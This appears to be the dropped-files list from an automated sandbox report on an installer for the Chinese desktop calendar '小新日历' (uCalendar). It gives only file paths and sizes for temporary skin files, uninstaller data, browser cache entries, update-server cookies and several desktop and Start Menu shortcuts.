    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IMBOL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S9S0K.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0FVRG.tmp (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GJFDH.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-71SNV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SJIC0.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6DTUJ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QAKU2.tmp (25 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9TLEA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2LCQJ.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-05TI6.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FU923.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R66KJ.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3H86F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GLIR6.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-46B8N.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6G59B.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5FR8P.tmp (913 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TK5N6.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0VFG1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKGKG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SEBU8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GPUG4.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2CI1C.tmp (414 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L41F1.tmp (17 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ESTCQ.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2GDDK.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9M85H.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F8PVH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TFPS7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-KJA02.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MTLQ9.tmp (686 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\a1[1].htm (100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P6CRT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2J6MD.tmp (317 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5I6TG.tmp (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J8GQQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3DN0I.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-316BT.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BH7KA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G8JJ3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A9JQ8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S7KL5.tmp (555 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FGDDO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UMDHA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3C4AS.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFB1B.tmp (290 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J82M1.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2NU3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OSOGC.tmp (399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IUPL8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SAHIH.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IE9GS.tmp (7 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SBNVG.tmp (13 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\访问 小新日历 官网.url (59 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-QT79M.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CC08P.tmp (523 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NV4JR.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3SAPP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V00NQ.tmp (408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G5L56.tmp (578 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
    %Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CQ2G0.tmp (680 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H454P.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNLME.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V0GI3.tmp (460 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6MUOK.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K6A4L.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J3A1P.tmp (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R3ENI.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OT7F7.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE59E.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N9TNV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F3GLM.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RPQTQ.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1BO97.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-EIJBG.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-224GL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16KT2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-457SG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0RAC9.tmp (379 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L9R13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VC40Q.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-134QI.tmp (37 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-12F6F.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EPU0G.tmp (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GR1F1.tmp (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J635K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-0RK1D.tmp (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0QAU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U8HBE.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8CE4A.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-FG2A2.tmp (8281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LK4FU.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V625H.tmp (348 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-89JKG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-54RS6.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PVBA9.tmp (930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-LQKHS.tmp (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-91HFL.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7V3M5.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RR67N.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D5SAM.tmp (122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T93Q7.tmp (978 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2QH3K.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UEO5K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-412CP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3HB2E.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7AIGQ.tmp (536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6C897.tmp (346 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2JDM2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RAN83.tmp (450 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-01GK7.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\tj_get (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NU9MK.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D7GKR.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G4QOL.tmp (423 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L2QRQ.tmp (998 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-D9EF4.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJMC9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8SQ3K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ICSK7.tmp (442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B1VSJ.tmp (565 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H6UDG.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-PL60I.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q5IHQ.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-Q9602.tmp (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6U4PP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3OV3S.tmp (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIQHK.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5OQO8.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ARCFV.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\core[1].php (751 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD23K.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U58P4.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SFKB5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V4CEI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B3HA8.tmp (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[2].txt (1434 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GNV8E.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6FEFD.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-776D0.tmp (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-5H9QJ.tmp (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S6Q82.tmp (605 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-16QRI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SLEVI.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ABKJC.tmp (956 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3B5UH.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TVVUF.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S26CD.tmp (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-CI790.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-94MCM.tmp (586 bytes)
    %Documents and Settings%\All Users\Desktop\ Intener Hao123.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DASMI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8FIHU.tmp (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-Q84VT.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PGQ9B.tmp (183 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OQ3T0.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99VDN.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-3G7MO.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CJ1R8.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-U404O.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKH3C.tmp (314 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3GQB0.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\webctrl.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2FA4J.tmp (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6J672.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9UI34.tmp (248 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5B0J5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S95AA.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IT5G9.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K8C4N.tmp (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GH8V2.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8O12A.tmp (822 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TMDND.tmp (46 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-D9BCS.tmp (97 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VJS7P.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NCEGP.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VFH95.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MQF6A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@update.xiaoxinrili[1].txt (2149 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPNA1.tmp (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NML75.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IBNEQ.tmp (18 bytes)
    %Documents and Settings%\All Users\Desktop\小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V509A.tmp (313 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-POHV2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4EA8J.tmp (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NICBF.tmp (247 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAK3A.tmp (382 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-394GB.tmp (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\小新日历\卸载 小新日历.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G0SMU.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\icon_9[1].gif (893 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CIVFE.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RERKV.tmp (530 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NJF6C.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-C4IKR.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RK743.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7UBNI.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3LIFE.tmp (745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-598FD.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EEJC5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-41LLL.tmp (479 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\htmlinset1[1].txt (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\PopBoxSmall[1].txt (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FMTFilterinset[1].txt (108 bytes)
